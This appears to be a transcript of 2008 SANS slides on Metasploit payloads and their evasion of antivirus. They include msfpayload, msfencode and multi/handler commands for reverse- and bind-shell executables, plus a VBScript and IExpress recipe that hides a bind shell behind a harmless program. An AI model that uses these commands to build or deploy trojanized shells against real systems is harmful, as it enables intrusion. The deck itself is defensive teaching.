Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

Published byLouisa Davidson Modified over 9 years ago

Similar presentations

Presentation on theme: "1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH."— Presentation transcript:

1 1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH

2 SANS Technology Institute - Candidate for Master of Science Degree 2 Objectives Learn how an attacker might use Metasploit standalone payloads against you See how these payloads are created, used and “trojanized” Understand what level of protection to expect from your antivirus

3 SANS Technology Institute - Candidate for Master of Science Degree 3 How are they used against you? Can be executed by tricking a user into running the payload or via an exploit that is not in the framework Execute a payload on a fully patched system Use Meterpreter’s advanced functionality such as anti-forensics, detection evasion, and pivoting Scenario: –Attacker bruteforces password to a fully patched machine –Runs Meterpreter payload and uses it to pivot –Uses framework to attack other hosts on DMZ

4 SANS Technology Institute - Candidate for Master of Science Degree 4 msfpayload Generates payloads in various formats –Source code in C, Perl, Ruby, Java –Hexadecimal (RAW) –Binary executable formats for Win32; Linux; OS X on Intel, PPC, iPhone –Java automatically selects Big Endian or Little Endian depending upon processor of targeted payload –You can override this with a simple modification to msfpayload (js_be, js_le)

5 SANS Technology Institute - Candidate for Master of Science Degree 5 Demonstration See how these payloads are created

6 SANS Technology Institute - Candidate for Master of Science Degree 6 Interacting with payloads Some payloads will not work standalone –find_port, find_tag Bind shell payloads can be used outside of the framework Others require the use of the multi/handler exploit

7 SANS Technology Institute - Candidate for Master of Science Degree 7 Using multi/handler./msfcli exploit/multi/handler \ PAYLOAD=windows/vncinject/reverse_tcp \ RHOST=192.168.100.3 \ DisableCourtesyShell=TRUE E./msfpayload \ windows/vncinjection/reverse_tcp \ LHOST=192.168.100.5 X > vncrev.exe CREATION - LHOST is the attacker’s IP USE - RHOST is the victim’s IP

8 SANS Technology Institute - Candidate for Master of Science Degree 8 Demonstration See how these payloads are used

9 SANS Technology Institute - Candidate for Master of Science Degree 9 msfencode Will encode a payload using one of various algorithms Expects RAW msfpayload as input -h for help -l list of available encoders -e encoder to use -t output type -b characters to avoid

10 SANS Technology Institute - Candidate for Master of Science Degree 10 msfencode -> Binary Binary was not a selectable output type from msfencode until Sept 29 th 2008 3 ways to create a binary –Add 3 lines of code to msfencode –Generate RAW output and use a hex editor to place it in a binary PE format –Generate C source code and compile it -t exe option will encode a Windows binary

11 SANS Technology Institute - Candidate for Master of Science Degree 11 msfencode (continued)./msfpayload windows/shell_bind_tcp R |\./msfencode -e x86/shikata_ga_nia -t exe./msfpayload windows/shell_bind_tcp R |\./msfencode -e x86/shikata_ga_nia –b\ “\x41\x42\x43” -t exe Text.to_win32pe() uses /data/templates –Use your own binaries with “PAYLOAD:” tag –To_win32pe chooses a random base relocation address (4 bytes at position 0x88) –Roll your own with template.c

12 SANS Technology Institute - Candidate for Master of Science Degree 12 Turning payloads into trojans IExpress is a setup utility that comes with Windows XP Can create packages that visibly execute a benign host program and invisibly execute a malicious payload All you need is a small VBscript to execute your payload invisibly Trojan payloads only temporarily avoid antivirus

13 SANS Technology Institute - Candidate for Master of Science Degree 13 Payload script The script Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "mspaint.exe",1, False Wshshell.Run "bindshell.exe",0, False Quick IExpress Demonstration –See how these payloads are “trojanized”

14 SANS Technology Institute - Candidate for Master of Science Degree 14 Level of protection to expect from your antivirus Expected results: Low rate of detection for unencoded payloads and no detection for encoded payloads Actual results: No detection for unencoded payloads or encoded payloads 2 products’ heuristics flagged payloads Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload My HIPS testing yielded disappointing results HD Moore has stated that version 3.2 will generate a new Windows Binary that is harder to detect.

15 SANS Technology Institute - Candidate for Master of Science Degree 15 Summary Metasploit is a powerful framework with a diverse set of tools Using these tools attackers can easily create standalone payloads that run on fully patched systems Antivirus products do not at this time provide adequate protection against Metasploit payloads My paper is in the SANS reading room titled “Effectiveness of Antivirus Detecting Metasploit Payloads”

Download ppt "1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH."

Similar presentations

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.

Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.
Armitage and Metasploit Penetration Testing Lab

Armitage and Metasploit Penetration Testing Lab
Presenter: Robbie Corley Organization: KCTCS

Presenter: Robbie Corley Organization: KCTCS
Moving Target Defense in Cyber Security

Moving Target Defense in Cyber Security
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Baselining Windows and Comparative Analysis: Quick and Easy Kevin Fuller May 2012.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Baselining Windows and Comparative Analysis: Quick and Easy Kevin Fuller May 2012.
1 SANS Technology Institute - Candidate for Master of Science Degree 1 SIEM Based Intrusion Detection Jim Beechey March 2010 GSEC Gold, GCIA Gold, GCIH,

1 SANS Technology Institute - Candidate for Master of Science Degree 1 SIEM Based Intrusion Detection Jim Beechey March 2010 GSEC Gold, GCIA Gold, GCIH,
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
91.661 Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling.

Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Browser Exploitation Framework (BeEF) Lab

Browser Exploitation Framework (BeEF) Lab
Guide To UNIX Using Linux Third Edition

Guide To UNIX Using Linux Third Edition
Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.

Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
By Jeerarat Boonyanit. As you can see I have chosen Cpanel for my server management tool. cPanel is a Linux based web hosting control panel that provides.

By Jeerarat Boonyanit. As you can see I have chosen Cpanel for my server management tool. cPanel is a Linux based web hosting control panel that provides.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

Similar presentations

Ads by Google